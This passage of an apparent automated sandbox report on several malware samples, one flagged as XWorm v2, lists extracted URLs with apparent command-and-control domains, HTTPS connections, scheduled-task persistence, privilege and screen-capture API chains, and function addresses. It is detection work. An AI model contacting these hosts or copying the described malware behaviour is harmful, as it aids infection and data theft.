Source: JqGBbm7.exe, 00000013.00000003.2308302308.0000000005EE8000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000003.2309052639.0000000005EEC000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000003.2397963341.0000000001394000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000003.2318299324.0000000005EEC000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000002.2401251892.0000000001394000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gadgethgfub.icu/apir
Source: JqGBbm7.exe, 00000013.00000003.2397963341.0000000001394000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000003.2360921403.0000000001394000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000003.2361436350.0000000001394000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000002.2401251892.0000000001394000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000003.2308373530.0000000001394000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gadgethgfub.icu/e
Source: JqGBbm7.exe, 00000013.00000003.2351044700.0000000001394000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000003.2308373530.0000000001394000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gadgethgfub.icu/pi
Source: JqGBbm7.exe, 00000013.00000003.2351044700.0000000001394000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gadgethgfub.icu/rsTW
Source: JqGBbm7.exe, 00000013.00000003.2397963341.0000000001394000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000003.2360921403.0000000001394000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000003.2361436350.0000000001394000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000002.2401251892.0000000001394000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gadgethgfub.icu/ws
Source: JqGBbm7.exe, 00000013.00000003.2308373530.0000000001394000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gadgethgfub.icu:443/api
Source: JqGBbm7.exe, 00000013.00000003.2360921403.0000000001394000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000003.2361436350.0000000001394000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gadgethgfub.icu:443/apiWdtPWdtP
Source: 3Mv6i65.exe, 00000015.00000002.2535195995.000001ED4D132000.00000004.00000020.00020000.00000000.sdmp, 3Mv6i65.exe, 00000015.00000003.2119636393.000001ED4EDDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: 3Mv6i65.exe, 00000015.00000002.2565726035.000001ED4F2B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/asweigart/pyperclip/issues/55
Source: 3Mv6i65.exe, 00000015.00000002.2565726035.000001ED4F2B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/asweigart/pyperclip/issues/55S
Source: 3Mv6i65.exe, 00000015.00000002.2539205809.000001ED4EB70000.00000004.00001000.00020000.00000000.sdmp, 3Mv6i65.exe, 00000015.00000003.2119636393.000001ED4EDDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: 3Mv6i65.exe, 00000015.00000003.2119636393.000001ED4EDDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: 3Mv6i65.exe, 00000015.00000002.2535195995.000001ED4D132000.00000004.00000020.00020000.00000000.sdmp, 3Mv6i65.exe, 00000015.00000003.2119636393.000001ED4EDDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: 3Mv6i65.exe, 00000015.00000003.2125043902.000001ED4EE62000.00000004.00000020.00020000.00000000.sdmp, 3Mv6i65.exe, 00000015.00000003.2124692238.000001ED4F276000.00000004.00000020.00020000.00000000.sdmp, 3Mv6i65.exe, 00000015.00000003.2124966223.000001ED4EE56000.00000004.00000020.00020000.00000000.sdmp, 3Mv6i65.exe, 00000015.00000003.2124920262.000001ED4F277000.00000004.00000020.00020000.00000000.sdmp, 3Mv6i65.exe, 00000015.00000002.2544921210.000001ED4F0F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/issues/86361.
Source: 3Mv6i65.exe, 00000015.00000002.2535195995.000001ED4D132000.00000004.00000020.00020000.00000000.sdmp, 3Mv6i65.exe, 00000015.00000003.2119636393.000001ED4EDDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: khykuQw.exe, 00000016.00000003.2362943699.000000000329D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: 3Mv6i65.exe, 00000015.00000002.2543815514.000001ED4EFB0000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.20.dr	String found in binary or memory: https://peps.python.org/pep-0205/
Source: 3Mv6i65.exe, 00000015.00000002.2669480863.00007FFB0C141000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: https://peps.python.org/pep-0263/
Source: 3Mv6i65.exe, 00000015.00000002.2565726035.000001ED4F340000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://pyperclip.readthedocs.io/en/latest/index.html#not-implemented-error
Source: khykuQw.exe, 00000016.00000003.2330034111.00000000032AB000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2512459473.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2367332906.0000000003291000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2367847779.0000000003291000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000002.2516527059.000000000327C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://socialsscesforum.icu/
Source: khykuQw.exe, 00000016.00000003.2462591860.00000000032A5000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2512459473.00000000032AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://socialsscesforum.icu/7
Source: khykuQw.exe, 00000016.00000002.2516527059.000000000327C000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2451398352.00000000032AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://socialsscesforum.icu/api
Source: khykuQw.exe, 00000016.00000003.2513186468.0000000003291000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000002.2516527059.0000000003291000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://socialsscesforum.icu/api%
Source: khykuQw.exe, 00000016.00000003.2451986006.000000000327C000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2513022272.000000000327C000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2463261808.000000000327C000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2500209501.000000000327C000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000002.2516527059.000000000327C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://socialsscesforum.icu/apiWs
Source: khykuQw.exe, 00000016.00000003.2268651969.0000000000F8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://socialsscesforum.icu/apii
Source: khykuQw.exe, 00000016.00000003.2462591860.00000000032A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://socialsscesforum.icu/apint
Source: khykuQw.exe, 00000016.00000003.2462591860.00000000032A5000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2366665047.00000000032AE000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2457032117.00000000032A5000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2362728212.00000000032AE000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2451398352.00000000032AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://socialsscesforum.icu/apir
Source: khykuQw.exe, 00000016.00000003.2462591860.00000000032A5000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2457032117.00000000032A5000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2451398352.00000000032AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://socialsscesforum.icu/apit
Source: khykuQw.exe, 00000016.00000003.2513022272.000000000327C000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000002.2516527059.000000000327C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://socialsscesforum.icu/lK3
Source: khykuQw.exe, 00000016.00000003.2463261808.000000000327C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://socialsscesforum.icu:443/api
Source: khykuQw.exe, 00000016.00000003.2351117766.0000000003A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: khykuQw.exe, 00000016.00000003.2351117766.0000000003A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: khykuQw.exe, 00000016.00000003.2268595964.0000000003269000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/socialsscesforum
Source: khykuQw.exe, 00000016.00000003.2268595964.0000000003269000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: JqGBbm7.exe, 00000013.00000003.2309083086.0000000005EE1000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2362943699.000000000329D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: 2X0520.exe, 00000008.00000003.1331134331.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000003.1307512484.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000003.1331367284.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000003.1307172938.000000000113F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.
Source: 2X0520.exe, 00000008.00000003.1331134331.0000000001122000.00000004.00000020.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000003.1307172938.000000000113F000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000003.2070184119.0000000001374000.00000004.00000020.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2268595964.0000000003269000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2268595964.0000000003272000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: 2X0520.exe, 00000008.00000003.1307512484.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000003.1307172938.000000000113F000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000003.2070184119.0000000001374000.00000004.00000020.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2268595964.0000000003269000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2268595964.0000000003272000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: 2X0520.exe, 00000008.00000003.1333016415.0000000005B3A000.00000004.00000800.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000003.1332759077.0000000005B38000.00000004.00000800.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000003.1332661421.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000003.2072800882.0000000005F27000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000003.2072685224.0000000005F2A000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2319759960.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2319908383.0000000003838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 2X0520.exe, 00000008.00000003.1332759077.0000000005B38000.00000004.00000800.00020000.00000000.sdmp, 2X0520.exe, 00000008.00000003.1332661421.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000003.2072800882.0000000005F27000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000003.2072685224.0000000005F2A000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2319759960.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2319908383.0000000003838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: JqGBbm7.exe, 00000013.00000003.2309083086.0000000005EE1000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2362943699.000000000329D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: khykuQw.exe, 00000016.00000003.2351117766.0000000003A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: khykuQw.exe, 00000016.00000003.2351117766.0000000003A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: 2X0520.exe, 00000008.00000003.1361964435.0000000005C0F000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000003.2295896804.0000000006007000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2351117766.0000000003A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: khykuQw.exe, 00000016.00000003.2351117766.0000000003A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 2X0520.exe, 00000008.00000003.1361964435.0000000005C0F000.00000004.00000800.00020000.00000000.sdmp, JqGBbm7.exe, 00000013.00000003.2295896804.0000000006007000.00000004.00000800.00020000.00000000.sdmp, khykuQw.exe, 00000016.00000003.2351117766.0000000003A49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 3Mv6i65.exe, 00000015.00000002.2707447896.00007FFB0C2B7000.00000008.00000001.01000000.00000010.sdmp	String found in binary or memory: https://www.python.org/psf/license/
Source: 3Mv6i65.exe, 00000015.00000002.2669480863.00007FFB0C141000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: https://www.python.org/psf/license/)

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49981 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49983 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49985 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49986 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49990 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.123:443 -> 192.168.2.7:49991 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.123:443 -> 192.168.2.7:49993 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49994 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49996 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.123:443 -> 192.168.2.7:49997 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.123:443 -> 192.168.2.7:49999 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.123:443 -> 192.168.2.7:50000 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:50002 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.123:443 -> 192.168.2.7:50003 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:50005 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.123:443 -> 192.168.2.7:50011 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.123:443 -> 192.168.2.7:50014 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe

Code function: 2_2_00F761F0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,

2_2_00F761F0

System Summary

Malicious sample detected (through community Yara rule)

Source: 33.2.d0HNrLB.exe.353e970.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm v2 samples based on characteristic strings Author: Sekoia.io
Source: 34.2.d0HNrLB.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm v2 samples based on characteristic strings Author: Sekoia.io
Source: 33.2.d0HNrLB.exe.353e970.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm v2 samples based on characteristic strings Author: Sekoia.io

.NET source code contains very large strings

Source: 33.2.d0HNrLB.exe.353e970.0.raw.unpack, Settings.cs	Long String: Length: 23845
Source: 33.2.d0HNrLB.exe.353e970.0.raw.unpack, Settings.cs	Long String: Length: 23845
Source: 33.2.d0HNrLB.exe.353e970.0.raw.unpack, Settings.cs	Long String: Length: 23845
Source: 33.2.d0HNrLB.exe.353e970.0.raw.unpack, Settings.cs	Long String: Length: 23845
Source: 33.2.d0HNrLB.exe.353e970.0.raw.unpack, Settings.cs	Long String: Length: 23845
Source: 33.2.d0HNrLB.exe.353e970.0.raw.unpack, Settings.cs	Long String: Length: 23845
Source: 33.2.d0HNrLB.exe.353e970.0.raw.unpack, Settings.cs	Long String: Length: 23845
Source: 33.2.d0HNrLB.exe.353e970.0.raw.unpack, Settings.cs	Long String: Length: 23845
Source: 33.2.d0HNrLB.exe.353e970.0.raw.unpack, Settings.cs	Long String: Length: 23845
Source: 33.2.d0HNrLB.exe.353e970.0.raw.unpack, Settings.cs	Long String: Length: 23845
Source: 33.2.d0HNrLB.exe.353e970.0.raw.unpack, Settings.cs	Long String: Length: 23845

PE file contains section with special chars

Source: 2X0520.exe.0.dr	Static PE information: section name:
Source: 2X0520.exe.0.dr	Static PE information: section name: .idata
Source: KI2Q1PIQVVVTNGJPW8.exe.8.dr	Static PE information: section name:
Source: KI2Q1PIQVVVTNGJPW8.exe.8.dr	Static PE information: section name: .idata
Source: KI2Q1PIQVVVTNGJPW8.exe.8.dr	Static PE information: section name:
Source: JqGBbm7[1].exe.15.dr	Static PE information: section name:
Source: JqGBbm7[1].exe.15.dr	Static PE information: section name: .idata
Source: JqGBbm7.exe.15.dr	Static PE information: section name:
Source: JqGBbm7.exe.15.dr	Static PE information: section name: .idata

Source: C:\Users\user\Desktop\S2W2ftXM2b.exe

Code function: 0_2_00CF1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,

0_2_00CF1F90

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	File created: C:\Windows\Tasks\rapes.job			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	File created: C:\Windows\Tasks\rapes.job			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe

File deleted: C:\Windows\Tasks\rapes.job

Jump to behavior

Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	Code function: 0_2_00CF3BA2	0_2_00CF3BA2
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	Code function: 0_2_00CF5C9E	0_2_00CF5C9E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: 2_2_00F761F0	2_2_00F761F0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: 2_2_00FB4047	2_2_00FB4047
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: 2_2_00F751A0	2_2_00F751A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: 2_2_00F9B4C0	2_2_00F9B4C0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: 2_2_00F75450	2_2_00F75450
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: 2_2_00F9F6DB	2_2_00F9F6DB
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: 2_2_00FAC6DD	2_2_00FAC6DD
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: 2_2_00FB18D7	2_2_00FB18D7
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: 2_2_00FB5CD4	2_2_00FB5CD4
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: 2_2_00FA2C20	2_2_00FA2C20
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: 2_2_00FB5DF4	2_2_00FB5DF4
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: 2_2_00F74EF0	2_2_00F74EF0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: 2_2_00FACE69	2_2_00FACE69
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 6_2_004B4047	6_2_004B4047
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 6_2_004761F0	6_2_004761F0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 6_2_004AC6DD	6_2_004AC6DD
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 6_2_004A2C20	6_2_004A2C20
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 6_2_004ACE69	6_2_004ACE69
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 6_2_00474EF0	6_2_00474EF0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 6_2_004751A0	6_2_004751A0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 6_2_00475450	6_2_00475450
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 6_2_0049B4C0	6_2_0049B4C0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 6_2_0049F6DB	6_2_0049F6DB
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 6_2_004B18D7	6_2_004B18D7
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 6_2_004B5CD4	6_2_004B5CD4
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 6_2_004B5DF4	6_2_004B5DF4
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0086F0C0	8_2_0086F0C0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0086A030	8_2_0086A030
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00836076	8_2_00836076
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_00833183	8_2_00833183
